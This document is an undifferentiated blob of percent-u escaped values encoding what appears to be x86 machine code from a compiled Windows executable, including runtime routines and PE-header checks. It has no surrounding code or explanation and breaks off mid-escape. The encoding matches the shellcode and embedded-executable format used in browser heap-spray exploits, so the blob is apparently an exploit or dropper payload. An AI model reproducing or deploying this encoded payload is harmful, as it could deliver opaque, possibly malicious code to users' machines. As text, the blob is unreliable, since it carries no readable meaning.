%u0000%ue800%ufd3b%uffff%ub6ff%u0098%u0000%u30e8%ufffd%uffff%u9cb6%u0000%ue800%ufd25%uffff%ub6ff%u00a0%u0000%u1ae8%ufffd%uffff%ua4b6%u0000%ue800%ufd0f%uffff%ub6ff%u00a8%u0000%u04e8%ufffd%u83ff%u2cc4%u5d5e%u8bc3%u55ff%uec8b%u8b56%u0875%uf685%u3574%u068b%u053b%uaaa8%u0040%u0774%ue850%ufce1%uffff%u8b59%u0446%u053b%uaaac%u0040%u0774%ue850%ufccf%uffff%u8b59%u0876%u353b%uaab0%u0040%u0774%ue856%ufcbd%uffff%u5e59%uc35d%uff8b%u8b55%u56ec%u758b%u8508%u74f6%u8b7e%u0c46%u053b%uaab4%u0040%u0774%ue850%ufc9b%uffff%u8b59%u1046%u053b%uaab8%u0040%u0774%ue850%ufc89%uffff%u8b59%u1446%u053b%uaabc%u0040%u0774%ue850%ufc77%uffff%u8b59%u1846%u053b%uaac0%u0040%u0774%ue850%ufc65%uffff%u8b59%u1c46%u053b%uaac4%u0040%u0774%ue850%ufc53%uffff%u8b59%u2046%u053b%uaac8%u0040%u0774%ue850%ufc41%uffff%u8b59%u2476%u353b%uaacc%u0040%u0774%ue856%ufc2f%uffff%u5e59%uc35d%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%u8b55%u56ec%uc033%u5050%u5050%u5050%u5050%u558b%u8d0c%u0049%u028a%uc00a%u0974%uc283%u0f01%u04ab%ueb24%u8bf1%u0875%uc983%u8dff%u0049%uc183%u8a01%u0a06%u74c0%u8309%u01c6%ua30f%u2404%uee73%uc18b%uc483%u5e20%uc3c9%uff8b%u8b55%u8bec%u084d%u3353%u56db%u3b57%u74cb%u8b07%u0c7d%ufb3b%u1b77%uc5e8%uffd1%u6aff%u5e16%u3089%u5353%u5353%ue853%ud14e%uffff%uc483%u8b14%uebc6%u8b30%u1075%uf33b%u0475%u1988%udaeb%ud18b%u068a%u0288%u4642%uc33a%u0374%u754f%u3bf3%u75fb%u8810%ue819%ud18a%uffff%u226a%u8959%u8b08%uebf1%u33c1%u5fc0%u5b5e%uc35d%ucccc%u8b55%u57ec%u8b56%u0c75%u4d8b%u8b10%u087d%uc18b%ud18b%uc603%ufe3b%u0876%uf83b%u820f%u01a4%u0000%uf981%u0100%u0000%u1f72%u3d83%ub6b0%u0040%u7400%u5716%u8356%u0fe7%ue683%u3b0f%u5efe%u755f%u5e08%u5d5f%uede9%u0021%uf700%u03c7%u0000%u7500%uc115%u02e9%ue283%u8303%u08f9%u2a72%ua5f3%u24ff%u0495%u4052%u9000%uc78b%u03ba%u0000%u8300%u04e9%u0c72%ue083%u0303%uffc8%u8524%u5118%u0040%u24ff%u148d%u4052%u9000%u24ff%u988d%u4051%u9000%u5128%u0040%u5154%u0040%u5178%u0040%ud123%u068a%u0788%u468a%u8801%u0147%u468a%uc102%u02e9%u4788%u8302%u03c6%uc783%u8303%u08f9%ucc72%ua5f3%u24ff%u0495%u4052%u8d00%u0049%ud123%u068a%u0788%u468a%uc101%u02e9%u4788%u8301%u02c6%uc783%u8302%u08f9%ua672%ua5f3%u24ff%u0495%u4052%u9000%ud123%u068a%u0788%uc683%uc101%u02e9%uc783%u8301%u08f9%u8872%ua5f3%u24ff%u0495%u4052%u8d00%u0049%u51fb%u0040%u51e8%u0040%u51e0%u0040%u51d8%u0040%u51d0%u0040%u51c8%u0040%u51c0%u0040%u51b8%u0040%u448b%ue48e%u4489%ue48f%u448b%ue88e%u4489%ue88f%u448b%uec8e%u4489%uec8f%u448b%uf08e%u4489%uf08f%u448b%uf48e%u4489%uf48f%u448b%uf88e%u4489%uf88f%u448b%ufc8e%u4489%ufc8f%u048d%u008d%u0000%u0300%u03f0%ufff8%u9524%u5204%u0040%uff8b%u5214%u0040%u521c%u0040%u5228%u0040%u523c%u0040%u458b%u5e08%uc95f%u90c3%u068a%u0788%u458b%u5e08%uc95f%u90c3%u068a%u0788%u468a%u8801%u0147%u458b%u5e08%uc95f%u8dc3%u0049%u068a%u0788%u468a%u8801%u0147%u468a%u8802%u0247%u458b%u5e08%uc95f%u90c3%u748d%ufc31%u7c8d%ufc39%uc7f7%u0003%u0000%u2475%ue9c1%u8302%u03e2%uf983%u7208%ufd0d%ua5f3%ufffc%u9524%u53a0%u0040%uff8b%ud9f7%u24ff%u508d%u4053%u8d00%u0049%uc78b%u03ba%u0000%u8300%u04f9%u0c72%ue083%u2b03%uffc8%u8524%u52a4%u0040%u24ff%ua08d%u4053%u9000%u52b4%u0040%u52d8%u0040%u5300%u0040%u468a%u2303%u88d1%u0347%uee83%uc101%u02e9%uef83%u8301%u08f9%ub272%uf3fd%ufca5%u24ff%ua095%u4053%u8d00%u0049%u468a%u2303%u88d1%u0347%u468a%uc102%u02e9%u4788%u8302%u02ee%uef83%u8302%u08f9%u8872%uf3fd%ufca5%u24ff%ua095%u4053%u9000%u468a%u2303%u88d1%u0347%u468a%u8802%u0247%u468a%uc101%u02e9%u4788%u8301%u03ee%uef83%u8303%u08f9%u820f%uff56%uffff%uf3fd%ufca5%u24ff%ua095%u4053%u8d00%u0049%u5354%u0040%u535c%u0040%u5364%u0040%u536c%u0040%u5374%u0040%u537c%u0040%u5384%u0040%u5397%u0040%u448b%u1c8e%u4489%u1c8f%u448b%u188e%u4489%u188f%u448b%u148e%u4489%u148f%u448b%u108e%u4489%u108f%u448b%u0c8e%u4489%u0c8f%u448b%u088e%u4489%u088f%u448b%u048e%u4489%u048f%u048d%u008d%u0000%u0300%u03f0%ufff8%u9524%u53a0%u0040%uff8b%u53b0%u0040%u53b8%u0040%u53c8%u0040%u53dc%u0040%u458b%u5e08%uc95f%u90c3%u468a%u8803%u0347%u458b%u5e08%uc95f%u8dc3%u0049%u468a%u8803%u0347%u468a%u8802%u0247%u458b%u5e08%uc95f%u90c3%u468a%u8803%u0347%u468a%u8802%u0247%u468a%u8801%u0147%u458b%u5e08%uc95f%uccc3%ucccc%ucccc%ucccc%ucccc%ucccc%u4c8b%u0424%uc1f7%u0003%u0000%u2474%u018a%uc183%u8401%u74c0%uf74e%u03c1%u0000%u7500%u05ef%u0000%u0000%ua48d%u0024%u0000%u8d00%u24a4%u0000%u0000%u018b%uffba%ufefe%u037e%u83d0%ufff0%uc233%uc183%ua904%u0100%u8101%ue874%u418b%u84fc%u74c0%u8432%u74e4%ua924%u0000%u00ff%u1374%u00a9%u0000%u74ff%ueb02%u8dcd%uff41%u4c8b%u0424%uc12b%u8dc3%ufe41%u4c8b%u0424%uc12b%u8dc3%ufd41%u4c8b%u0424%uc12b%u8dc3%ufc41%u4c8b%u0424%uc12b%uccc3%ucccc%ucccc%u8b55%u56ec%uc033%u5050%u5050%u5050%u5050%u558b%u8d0c%u0049%u028a%uc00a%u0974%uc283%u0f01%u04ab%ueb24%u8bf1%u0875%uff8b%u068a%uc00a%u0c74%uc683%u0f01%u04a3%u7324%u8df1%uff46%uc483%u5e20%uc3c9%u086a%ub068%u4096%ue800%uec54%uffff%udce8%uffda%u8bff%u7840%uc085%u1674%u6583%u00fc%ud0ff%u07eb%uc033%uc340%u658b%uc7e8%ufc45%ufffe%uffff%ubae8%u001e%ue800%uec6d%uffff%u68c3%u54d0%u0040%ue3e8%uffd7%u59ff%u80a3%u40b2%uc300%uff8b%u8b55%u51ec%u5653%uff57%ue835%u40b7%ue800%ud843%uffff%u35ff%ub7e4%u0040%uf88b%u7d89%ue8fc%ud833%uffff%uf08b%u5959%uf73b%u820f%u0083%u0000%ude8b%udf2b%u438d%u8304%u04f8%u7772%ue857%u1f78%u0000%uf88b%u438d%u5904%uf83b%u4873%u00b8%u0008%u3b00%u73f8%u8b02%u03c7%u3bc7%u72c7%u500f%u75ff%ue8fc%uf79e%uffff%u5959%uc085%u1675%u478d%u3b10%u72c7%u5040%u75ff%ue8fc%uf788%uffff%u5959%uc085%u3174%ufbc1%u5002%u348d%ue898%ud74e%uffff%ua359%ub7e8%u0040%u75ff%ue808%ud740%uffff%u0689%uc683%u5604%u35e8%uffd7%u59ff%ue4a3%u40b7%u8b00%u0845%ueb59%u3302%u5fc0%u5b5e%uc3c9%uff8b%u6a56%u6a04%ue820%uf6f2%uffff%uf08b%ue856%ud70e%uffff%uc483%ua30c%ub7e8%u0040%ue4a3%u40b7%u8500%u75f6%u6a05%u5818%uc35e%u2683%u3300%u5ec0%u6ac3%u680c%u96d0%u0040%u1fe8%uffeb%ue8ff%uddfe%uffff%u6583%u00fc%u75ff%ue808%ufef8%uffff%u8959%ue445%u45c7%ufefc%uffff%ue8ff%u0009%u0000%u458b%ue8e4%ueb3b%uffff%ue8c3%udddd%uffff%u8bc3%u55ff%uec8b%u75ff%ue808%uffb7%uffff%ud8f7%uc01b%ud8f7%u4859%uc35d%uff8b%u5756%uff33%ub78d%uaaf0%u0040%u36ff%u8be8%uffd6%u83ff%u04c7%u8959%u8306%u28ff%ue872%u5e5f%uccc3%ucccc%ucccc%ucccc%uff8b%u8b55%u8bec%u084d%u4db8%u005a%u6600%u0139%u0474%uc033%uc35d%u418b%u033c%u81c1%u5038%u0045%u7500%u33ef%ub9d2%u010b%u0000%u3966%u1848%u940f%u8bc2%u5dc2%uccc3%ucccc%ucccc%ucccc%ucccc%ucccc%uff8b%u8b55%u8bec%u0845%u488b%u033c%u0fc8%u41b7%u5314%u0f56%u71b7%u3306%u57d2%u448d%u1808%uf685%u1b76%u7d8b%u8b0c%u0c48%uf93b%u0972%u588b%u0308%u3bd9%u72fb%u420a%uc083%u3b28%u72d6%u33e8%u5fc0%u5b5e%uc35d%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%uff8b%u8b55%u6aec%u68fe%u96f0%u0040%u9068%u4041%u6400%u00a1%u0000%u5000%uec83%u5308%u5756%ub4a1%u40a8%u3100%uf845%uc533%u8d50%uf045%ua364%u0000%u0000%u6589%uc7e8%ufc45%u0000%u0000%u0068%u4000%ue800%uff2a%uffff%uc483%u8504%u74c0%u8b55%u0845%u002d%u4000%u5000%u0068%u4000%ue800%uff50%uffff%uc483%u8508%u74c0%u8b3b%u2440%ue8c1%uf71f%u83d0%u01e0%u45c7%ufefc%uffff%u8bff%uf04d%u8964%u000d%u0000%u5900%u5e5f%u8b5b%u5de5%u8bc3%uec45%u088b%u018b%ud233%u053d%u0000%u0fc0%uc294%uc28b%u8bc3%ue865%u45c7%ufefc%uffff%u33ff%u8bc0%uf04d%u8964%u000d%u0000%u5900%u5e5f%u8b5b%u5de5%u8bc3%u55ff%uec8b%u458b%ua308%ub284%u0040%u88a3%u40b2%ua300%ub28c%u0040%u90a3%u40b2%u5d00%u8bc3%u55ff%uec8b%u458b%u8b08%u6c0d%u40a8%u5600%u5039%u7404%u8b0f%u6bf1%u0cf6%u7503%u8308%u0cc0%uc63b%uec72%uc96b%u030c%u084d%u3b5e%u73c1%u3905%u0450%u0274%uc033%uc35d%u35ff%ub28c%u0040%u44e8%uffd5%u59ff%u6ac3%u6820%u9710%u0040%uf5e8%uffe8%u33ff%u89ff%ue47d%u7d89%u8bd8%u085d%ufb83%u7f0b%u744c%u8b15%u6ac3%u5902%uc12b%u2274%uc12b%u0874%uc12b%u6474%uc12b%u4475%udde8%uffd6%u8bff%u89f8%ud87d%uff85%u1475%uc883%ue9ff%u0161%u0000%u84be%u40b2%ua100%ub284%u0040%u60eb%u77ff%u8b5c%ue8d3%uff5d%uffff%uf08b%uc683%u8b08%ueb06%u8b5a%u83c3%u0fe8%u3c74%ue883%u7406%u482b%u1c74%u5de8%uffc9%uc7ff%u1600%u0000%u3300%u50c0%u5050%u5050%ue3e8%uffc8%u83ff%u14c4%uaeeb%u8cbe%u40b2%ua100%ub28c%u0040%u16eb%u88be%u40b2%ua100%ub288%u0040%u0aeb%u90be%u40b2%ua100%ub290%u0040%u45c7%u01e4%u0000%u5000%u80e8%uffd4%u89ff%ue045%u3359%u83c0%ue07d%u0f01%ud884%u0000%u3900%ue045%u0775%u036a%u21e8%uffdd%u39ff%ue445%u0774%ue850%uf2b4%uffff%u3359%u89c0%ufc45%ufb83%u7408%u830a%u0bfb%u0574%ufb83%u7504%u8b1b%u604f%u4d89%u89d4%u6047%ufb83%u7508%u8b40%u644f%u4d89%uc7d0%u6447%u008c%u0000%ufb83%u7508%u8b2e%u600d%u40a8%u8900%udc4d%u0d8b%ua864%u0040%u158b%ua860%u0040%uca03%u4d39%u7ddc%u8b19%udc4d%uc96b%u8b0c%u5c57%u4489%u0811%u45ff%uebdc%ue8db%ud3e8%uffff%u0689%u45c7%ufefc%uffff%ue8ff%u0015%u0000%ufb83%u7508%uff1f%u6477%uff53%ue055%ueb59%u8b19%u085d%u7d8b%u83d8%ue47d%u7400%u6a08%ue800%uf142%uffff%uc359%uff53%ue055%u8359%u08fb%u0a74%ufb83%u740b%u8305%u04fb%u1175%u458b%u89d4%u6047%ufb83%u7508%u8b06%ud045%u4789%u3364%ue8c0%ue797%uffff%u8bc3%u55ff%uec8b%u458b%ua308%ub298%u0040%uc35d%uff8b%u8b55%u8bec%u0845%ua4a3%u40b2%u5d00%u8bc3%u55ff%uec8b%u458b%ua308%ub2a8%u0040%uc35d%u106a%u3068%u4097%ue800%ue718%uffff%u6583%u00fc%u75ff%uff0c%u0875%u15ff%u8064%u0040%u4589%uebe4%u8b2f%uec45%u008b%u008b%u4589%u33e0%u3dc9%u0017%uc000%u940f%u8bc1%uc3c1%u658b%u81e8%ue07d%u0017%uc000%u0875%u086a%u15ff%u80a8%u0040%u6583%u00e4%u45c7%ufefc%uffff%u8bff%ue445%u0ae8%uffe7%uc3ff%uff8b%u8b55%u8bec%u0845%uaca3%u40b2%u5d00%u8bc3%u55ff%uec8b%u35ff%ub2ac%u0040%ue6e8%uffd2%u59ff%uc085%u0f74%u75ff%uff08%u59d0%uc085%u0574%uc033%u5d40%u33c3%u5dc0%u8bc3%u55ff%uec8b%uec83%u5314%u5756%ub5e8%uffd2%u83ff%ufc65%u8300%ub03d%u40b2%u0000%ud88b%u850f%u008e%u0000%u7068%u4092%uff00%u2015%u4080%u8b00%u85f8%u0fff%u2a84%u0001%u8b00%u1c35%u4080%u6800%u9264%u0040%uff57%u85d6%u0fc0%u1484%u0001%u5000%uffe8%uffd1%uc7ff%u2404%u9254%u0040%ua357%ub2b0%u0040%ud6ff%ue850%ud1ea%uffff%u04c7%u4024%u4092%u5700%ub4a3%u40b2%uff00%u50d6%ud5e8%uffd1%uc7ff%u2404%u9224%u0040%ua357%ub2b8%u0040%ud6ff%ue850%ud1c0%uffff%ua359%ub2c0%u0040%uc085%u1474%u0c68%u4092%u5700%ud6ff%ue850%ud1a8%uffff%ua359%ub2bc%u0040%ubca1%u40b2%u3b00%u74c3%u394f%uc01d%u40b2%u7400%u5047%u06e8%uffd2%uffff%uc035%u40b2%u8b00%ue8f0%ud1f9%uffff%u5959%uf88b%uf685%u2c74%uff85%u2874%ud6ff%uc085%u1974%u4d8d%u51f8%u0c6a%u4d8d%u51ec%u016a%uff50%u85d7%u74c0%uf606%uf445%u7501%u8109%u104d%u0000%u0020%u39eb%ub4a1%u40b2%u3b00%u74c3%u5030%ub6e8%uffd1%u59ff%uc085%u2574%ud0ff%u4589%u85fc%u74c0%ua11c%ub2b8%u0040%uc33b%u1374%ue850%ud199%uffff%u8559%u74c0%uff08%ufc75%ud0ff%u4589%ufffc%ub035%u40b2%ue800%ud181%uffff%u8559%u74c0%uff10%u1075%u75ff%uff0c%u0875%u75ff%ufffc%uebd0%u3302%u5fc0%u5b5e%uc3c9%uff8b%u8b55%u8bec%u084d%u3356%u3bf6%u7cce%u831e%u02f9%u0c7e%uf983%u7503%ua114%uac68%u0040%u28eb%u68a1%u40ac%u8900%u680d%u40ac%ueb00%ue81b%uc5ca%uffff%u5656%u5656%uc756%u1600%u0000%ue800%uc552%uffff%uc483%u8314%uffc8%u5d5e%u8bc3%u55ff%uec8b%uec83%uff10%u0875%u4d8d%ue8f0%uc0b5%uffff%ub60f%u0c45%u4d8b%u8af4%u1455%u5484%u1d01%u1e75%u7d83%u0010%u1274%u4d8b%u8bf0%uc889%u0000%u0f00%u04b7%u2341%u1045%u02eb%uc033%uc085%u0374%uc033%u8040%ufc7d%u7400%u8b07%uf84d%u6183%ufd70%uc3c9%uff8b%u8b55%u6aec%u6a04%uff00%u0875%u006a%u9ae8%uffff%u83ff%u10c4%uc35d%uff8b%u8b55%u8bec%ub40d%u40b6%ua100%ub6b8%u0040%uc96b%u0314%uebc8%u8b11%u0855%u502b%u810c%u00fa%u1000%u7200%u8309%u14c0%uc13b%ueb72%uc033%uc35d%uff8b%u8b55%u83ec%u10ec%u4d8b%u8b08%u1041%u8b56%u0c75%u8b57%u2bfe%u0c79%uc683%uc1fc%u0fef%ucf8b%uc969%u0204%u0000%u8c8d%u4401%u0001%u8900%uf04d%u0e8b%u8949%ufc4d%uc1f6%u0f01%ud385%u0002%u5300%u1c8d%u8b31%u8913%uf455%u568b%u89fc%uf855%u558b%u89f4%u0c5d%uc2f6%u7501%uc174%u04fa%u834a%u3ffa%u0376%u3f6a%u8b5a%u044b%u4b3b%u7508%ubb42%u0000%u8000%ufa83%u7320%u8b19%ud3ca%u8deb%u024c%uf704%u21d3%ub85c%ufe44%u7509%u8b23%u084d%u1921%u1ceb%u4a8d%ud3e0%u8deb%u024c%uf704%u21d3%ub89c%u00c4%u0000%u09fe%u0675%u4d8b%u2108%u0459%u5d8b%u8b0c%u0853%u5b8b%u8b04%ufc4d%u4d03%u89f4%u045a%u558b%u8b0c%u045a%u528b%u8908%u0853%u4d89%u8bfc%uc1d1%u04fa%u834a%u3ffa%u0376%u3f6a%u8b5a%uf85d%ue383%u8901%uf45d%u850f%u008f%u0000%u752b%u8bf8%uf85d%ufbc1%u6a04%u893f%u0c75%u5e4b%ude3b%u0276%ude8b%u4d03%u8bf8%uc1d1%u04fa%u894a%ufc4d%ud63b%u0276%ud68b%uda3b%u5e74%u4d8b%u8b0c%u0471%u713b%u7508%ube3b%u0000%u8000%ufb83%u7320%u8b17%ud3cb%uf7ee%u21d6%ub874%ufe44%u034c%u7504%u8b21%u084d%u3121%u1aeb%u4b8d%ud3e0%uf7ee%u21d6%ub8b4%u00c4%u0000%u4cfe%u0403%u0675%u4d8b%u2108%u0471%u4d8b%u8b0c%u0871%u498b%u8904%u044e%u4d8b%u8b0c%u0471%u498b%u8908%u084e%u758b%ueb0c%u8b03%u085d%u7d83%u00f4%u0875%uda3b%u840f%u0080%u0000%u4d8b%u8df0%ud10c%u598b%u8904%u084e%u5e89%u8904%u0471%u4e8b%u8904%u0871%u4e8b%u3b04%u084e%u6075%u4c8a%u0402%u4d88%ufe0f%u88c1%u024c%u8304%u20fa%u2573%u7d80%u000f%u0e75%uca8b%u00bb%u0000%ud380%u8beb%u084d%u1909%u00bb%u0000%u8b80%ud3ca%u8deb%ub844%u0944%ueb18%u8029%u0f7d%u7500%u8d10%ue04a%u00bb%u0000%ud380%u8beb%u084d%u5909%u8d04%ue04a%u00ba%u0000%ud380%u8dea%ub884%u00c4%u0000%u1009%u458b%u89fc%u8906%u3044%u8bfc%uf045%u08ff%u850f%u00f3%u0000%uc4a1%u40b2%u8500%u0fc0%ud884%u0000%u8b00%uc80d%u40b6%u8b00%ue035%u4080%u6800%u4000%u0000%ue1c1%u030f%u0c48%u00bb%u0080%u5300%uff51%u8bd6%uc80d%u40b6%ua100%ub2c4%u0040%u00ba%u0000%ud380%u09ea%u0850%uc4a1%u40b2%u8b00%u1040%u0d8b%ub6c8%u0040%ua483%uc488%u0000%u0000%uc4a1%u40b2%u8b00%u1040%u48fe%ua143%ub2c4%u0040%u488b%u8010%u4379%u7500%u8309%u0460%ua1fe%ub2c4%u0040%u7883%uff08%u6575%u6a53%uff00%u0c70%ud6ff%uc4a1%u40b2%uff00%u1070%u006a%u35ff%ub11c%u0040%u15ff%u80e4%u0040%u0d8b%ub6b4%u0040%uc4a1%u40b2%u6b00%u14c9%u158b%ub6b8%u0040%uc82b%u4c8d%uec11%u8d51%u1448%u5051%uade8%u0015%u8b00%u0845%uc483%uff0c%ub40d%u40b6%u3b00%uc405%u40b2%u7600%u8304%u086d%ua114%ub6b8%u0040%uc0a3%u40b6%u8b00%u0845%uc4a3%u40b2%u8900%uc83d%u40b6%u5b00%u5e5f%uc3c9%uc4a1%u40b6%u5600%u358b%ub6b4%u0040%u3357%u3bff%u75f0%u8334%u10c0%uc06b%u5014%u35ff%ub6b8%u0040%uff57%u1c35%u40b1%uff00%u5815%u4080%u3b00%u75c7%u3304%uebc0%u8378%uc405%u40b6%u1000%u358b%ub6b4%u0040%ub8a3%u40b6%u6b00%u14f6%u3503%ub6b8%u0040%uc468%u0041%u6a00%uff08%u1c35%u40b1%uff00%u6015%u4080%u8900%u1046%uc73b%uc774%u046a%u0068%u0020%u6800%u0000%u0010%uff57%u5c15%u4080%u8900%u0c46%uc73b%u1275%u76ff%u5710%u35ff%ub11c%u0040%u15ff%u80e4%u0040%u9beb%u4e83%uff08%u3e89%u7e89%uff04%ub405%u40b6%u8b00%u1046%u0883%u8bff%u5fc6%uc35e%uff8b%u8b55%u51ec%u8b51%u084d%u418b%u5308%u8b56%u1071%u3357%uebdb%u0303%u43c0%uc085%uf97d%uc38b%uc069%u0204%u0000%u848d%u4430%u0001%u6a00%u893f%uf845%u895a%u0840%u4089%u8304%u08c0%u754a%u6af4%u8b04%u68fb%u1000%u0000%ue7c1%u030f%u0c79%u0068%u0080%u5700%u15ff%u805c%u0040%uc085%u0875%uc883%ue9ff%u009d%u0000%u978d%u7000%u0000%u5589%u3bfc%u77fa%u8b43%u2bca%uc1cf%u0ce9%u478d%u4110%u4883%ufff8%u8883%u0fec%u0000%u8dff%ufc90%u000f%u8900%u8d10%ufc90%uffef%uc7ff%ufc40%u0ff0%u0000%u5089%uc704%ue880%u000f%uf000%u000f%u0500%u1000%u0000%u7549%u8bcb%ufc55%u458b%u05f8%u01f8%u0000%u4f8d%u890c%u0448%u4189%u8d08%u0c4a%u4889%u8908%u0441%u6483%u449e%u3300%u47ff%ubc89%uc49e%u0000%u8a00%u4346%uc88a%uc1fe%uc084%u458b%u8808%u434e%u0375%u7809%uba04%u0000%u8000%ucb8b%uead3%ud2f7%u5021%u8b08%u5fc3%u5b5e%uc3c9%uff8b%u8b55%u83ec%u0cec%u4d8b%u8b08%u1041%u5653%u758b%u5710%u7d8b%u8b0c%u2bd7%u0c51%uc683%uc117%u0fea%uca8b%uc969%u0204%u0000%u8c8d%u4401%u0001%u8900%uf44d%u4f8b%u83fc%uf0e6%u3b49%u8df1%u397c%u8bfc%u891f%u104d%u5d89%u0ffc%u558e%u0001%uf600%u01c3%u850f%u0145%u0000%ud903%uf33b%u8f0f%u013b%u0000%u4d8b%uc1fc%u04f9%u8949%uf84d%uf983%u763f%u6a06%u593f%u4d89%u8bf8%u045f%u5f3b%u7508%ubb43%u0000%u8000%uf983%u7320%ud31a%u8beb%uf84d%u4c8d%u0401%ud3f7%u5c21%u4490%u09fe%u2675%u4d8b%u2108%ueb19%u831f%ue0c1%uebd3%u4d8b%u8df8%u014c%uf704%u21d3%u909c%u00c4%u0000%u09fe%u0675%u4d8b%u2108%u0459%u4f8b%u8b08%u045f%u5989%u8b04%u044f%u7f8b%u8908%u0879%u4d8b%u2b10%u01ce%ufc4d%u7d83%u00fc%u8e0f%u00a5%u0000%u7d8b%u8bfc%u0c4d%uffc1%u4f04%u4c8d%ufc31%uff83%u763f%u6a03%u5f3f%u5d8b%u8df4%ufb1c%u5d89%u8b10%u045b%u5989%u8b04%u105d%u5989%u8908%u044b%u598b%u8904%u084b%u598b%u3b04%u0859%u5775%u4c8a%u0407%u4d88%ufe13%u88c1%u074c%u8304%u20ff%u1c73%u7d80%u0013%u0e75%ucf8b%u00bb%u0000%ud380%u8beb%u084d%u1909%u448d%u4490%ucf8b%u20eb%u7d80%u0013%u1075%u4f8d%ubbe0%u0000%u8000%uebd3%u4d8b%u0908%u0459%u848d%uc490%u0000%u8d00%ue04f%u00ba%u0000%ud380%u09ea%u8b10%u0c55%u4d8b%u8dfc%u3244%u89fc%u8908%u014c%uebfc%u8b03%u0c55%u468d%u8901%ufc42%u4489%uf832%u3ce9%u0001%u3300%ue9c0%u0138%u0000%u8d0f%u012f%u0000%u5d8b%u290c%u1075%u4e8d%u8901%ufc4b%u5c8d%ufc33%u758b%uc110%u04fe%u894e%u0c5d%u4b89%u83fc%u3ffe%u0376%u3f6a%uf65e%ufc45%u0f01%u8085%u0000%u8b00%ufc75%ufec1%u4e04%ufe83%u763f%u6a03%u5e3f%u4f8b%u3b04%u084f%u4275%u00bb%u0000%u8380%u20fe%u1973%uce8b%uebd3%u748d%u0406%ud3f7%u5c21%u4490%u0efe%u2375%u4d8b%u2108%ueb19%u8d1c%ue04e%uebd3%u4c8d%u0406%ud3f7%u9c21%uc490%u0000%ufe00%u7509%u8b06%u084d%u5921%u8b04%u0c5d%u4f8b%u8b08%u0477%u7189%u8b04%u0877%u4f8b%u8904%u0871%u758b%u0310%ufc75%u7589%uc110%u04fe%u834e%u3ffe%u0376%u3f6a%u8b5e%uf44d%u0c8d%u8bf1%u0479%u4b89%u8908%u047b%u5989%u8b04%u044b%u5989%u8b08%u044b%u4b3b%u7508%u8a57%u064c%u8804%u0f4d%uc1fe%u4c88%u0406%ufe83%u7320%u801c%u0f7d%u7500%u8b0e%ubfce%u0000%u8000%uefd3%u4d8b%u0908%u8d39%u9044%u8b44%uebce%u8020%u0f7d%u7500%u8d10%ue04e%u00bf%u0000%ud380%u8bef%u084d%u7909%u8d04%u9084%u00c4%u0000%u4e8d%ubae0%u0000%u8000%uead3%u1009%u458b%u8910%u8903%u1844%u33fc%u40c0%u5e5f%uc95b%u8bc3%u55ff%uec8b%uec83%ua114%ub6b4%u0040%u4d8b%u6b08%u14c0%u0503%ub6b8%u0040%uc183%u8317%uf0e1%u4d89%uc1f0%u04f9%u4953%uf983%u5620%u7d57%u830b%uffce%ueed3%u4d83%ufff8%u0deb%uc183%u83e0%uffca%uf633%uead3%u5589%u8bf8%uc00d%u40b6%u8b00%uebd9%u8b11%u0453%u3b8b%u5523%u23f8%u0bfe%u75d7%u830a%u14c3%u5d89%u3b08%u72d8%u3be8%u75d8%u8b7f%ub81d%u40b6%ueb00%u8b11%u0453%u3b8b%u5523%u23f8%u0bfe%u75d7%u830a%u14c3%u5d89%u3b08%u72d9%u3be8%u75d9%ueb5b%u830c%u087b%u7500%u830a%u14c3%u5d89%u3b08%u72d8%u3bf0%u75d8%u8b31%ub81d%u40b6%ueb00%u8309%u087b%u7500%u830a%u14c3%u5d89%u3b08%u72d9%u3bf0%u75d9%ue815%ufaa0%uffff%ud88b%u5d89%u8508%u75db%u3307%ue9c0%u0209%u0000%ue853%ufb3a%uffff%u8b59%u104b%u0189%u438b%u8310%uff38%ue574%u1d89%ub6c0%u0040%u438b%u8b10%u8910%ufc55%ufa83%u74ff%u8b14%u908c%u00c4%u0000%u7c8b%u4490%u4d23%u23f8%u0bfe%u75cf%u8329%ufc65%u8b00%uc490%u0000%u8d00%u4448%u398b%u5523%u23f8%u0bfe%u75d7%uff0e%ufc45%u918b%u0084%u0000%uc183%ueb04%u8be7%ufc55%uca8b%uc969%u0204%u0000%u8c8d%u4401%u0001%u8900%uf44d%u4c8b%u4490%uff33%uce23%u1275%u8c8b%uc490%u0000%u2300%uf84d%u206a%ueb5f%u0303%u47c9%uc985%uf97d%u4d8b%u8bf4%uf954%u8b04%u2b0a%uf04d%uf18b%ufec1%u4e04%ufe83%u893f%uf84d%u037e%u3f6a%u3b5e%u0ff7%u0184%u0001%u8b00%u044a%u4a3b%u7508%u835c%u20ff%u00bb%u0000%u7d80%u8b26%ud3cf%u8beb%ufc4d%u7c8d%u0438%ud3f7%u5d89%u23ec%u885c%u8944%u885c%ufe44%u750f%u8b33%uec4d%u5d8b%u2108%ueb0b%u8d2c%ue04f%uebd3%u4d8b%u8dfc%u888c%u00c4%u0000%u7c8d%u0438%ud3f7%u1921%u0ffe%u5d89%u75ec%u8b0b%u085d%u4d8b%u21ec%u044b%u03eb%u5d8b%u8308%uf87d%u8b00%u084a%u7a8b%u8904%u0479%u4a8b%u8b04%u087a%u7989%u0f08%u8d84%u0000%u8b00%uf44d%u0c8d%u8bf1%u0479%u4a89%u8908%u047a%u5189%u8b04%u044a%u5189%u8b08%u044a%u4a3b%u7508%u8a5e%u064c%u8804%u0b4d%uc1fe%ufe83%u8820%u064c%u7d04%u8023%u0b7d%u7500%ubf0b%u0000%u8000%uce8b%uefd3%u3b09%uce8b%u00bf%u0000%ud380%u8bef%ufc4d%u7c09%u4488%u29eb%u7d80%u000b%u0d75%u4e8d%ubfe0%u0000%u8000%uefd3%u7b09%u8b04%ufc4d%ubc8d%uc488%u0000%u8d00%ue04e%u00be%u0000%ud380%u09ee%u8b37%uf84d%uc985%u0b74%u0a89%u4c89%ufc11%u03eb%u4d8b%u8bf8%uf075%ud103%u4e8d%u8901%u890a%u324c%u8bfc%uf475%u0e8b%u798d%u8901%u853e%u75c9%u3b1a%uc41d%u40b2%u7500%u8b12%ufc4d%u0d3b%ub6c8%u0040%u0775%u2583%ub2c4%u0040%u8b00%ufc4d%u0889%u428d%u5f04%u5b5e%uc3c9%ucccc%u5653%u8b57%u2454%u8b10%u2444%u8b14%u244c%u5518%u5052%u5151%u1868%u4068%u6400%u35ff%u0000%u0000%ub4a1%u40a8%u3300%u89c4%u2444%u6408%u2589%u0000%u0000%u448b%u3024%u588b%u8b08%u244c%u332c%u8b19%u0c70%ufe83%u74fe%u8b3b%u2454%u8334%ufefa%u0474%uf23b%u2e76%u348d%u8d76%ub35c%u8b10%u890b%u0c48%u7b83%u0004%ucc75%u0168%u0001%u8b00%